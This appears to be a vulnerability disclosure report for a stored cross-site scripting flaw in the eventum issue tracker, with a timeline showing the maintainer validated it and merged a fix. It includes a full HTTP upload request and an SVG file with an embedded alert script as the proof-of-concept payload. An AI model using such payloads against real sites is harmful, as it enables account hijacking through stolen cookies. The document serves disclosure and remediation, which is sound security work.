Cross-site Scripting (XSS) - Stored in eventum/eventum

Valid

Reported on

Oct 27th 2021


Description

Stored XSS via upload 'Attached Files' with format .svg

Proof of Concept

// PoC.req
POST /ajax/upload.php?file=dropfile HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1102758315284593653277397155
Content-Length: 1429
Origin: http://127.0.0.1:8888
Connection: close
Referer: http://127.0.0.1:8888/file_upload.php?iss_id=1
Cookie: euCookie=1; PHPSESSID=ii4ngj3mfm4nicm6ou1mra8e0k; eventum=YTo0OntzOjU6ImVtYWlsIjtzOjE3OiJhZG1pbkBleGFtcGxlLmNvbSI7czoxMDoibG9naW5fdGltZSI7aToxNjM1MzQ4OTE0O3M6OToicGVybWFuZW50IjtiOjE7czo0OiJoYXNoIjtzOjMyOiI5MjZhZjc0MDhlOWQ2OWYzYWNhMmQ5MjNiODEyZDAxYiI7fQ%3D%3D; REMEMBERME=RXZlbnR1bVxNb2RlbFxFbnRpdHlcVXNlcjpZV1J0YVc1QVpYaGhiWEJzWlM1amIyMD06MTY2Njg3NTg2NjoyZDEyNTEzZjExYTBlMDY3ZmZjNWQ2ZWFkODRkZTNiOGM5MjQ2ZmJhYTk3NGViMzQ3ZjQ3MDRjNDJlMDZlODhm; eventum_project=YToyOntzOjY6InByal9pZCI7aToxO3M6ODoicmVtZW1iZXIiO2k6MDt9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Pragma: no-cache

-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="filesize"

392
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="cat"

upload_file
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="issue_id"

1
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="iaf_ids"


-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="minimum_role"

1
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="file_description"


-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="null"

Upload File
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="dropfile[]"; filename="123.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>
-----------------------------1102758315284593653277397155--

Step to Reproduct

Create a file .svg contain payload

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Goto Create Issue and upload .svg file

The XSS will trigger when user click to filename. Example : http://[DOMAIN]/download.php?cat=attachment&id=3

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the eventum team and are waiting to hear back a month ago
We have sent a follow up to the eventum team. We will try again in 7 days. a month ago
We have sent a second follow up to the eventum team. We will try again in 10 days. a month ago
lethanhphuc submitted a
25 days ago
eventum/eventum maintainer validated this vulnerability 25 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
eventum/eventum maintainer confirmed that a fix has been merged on 1b8623 25 days ago
lethanhphuc has been awarded the fix bounty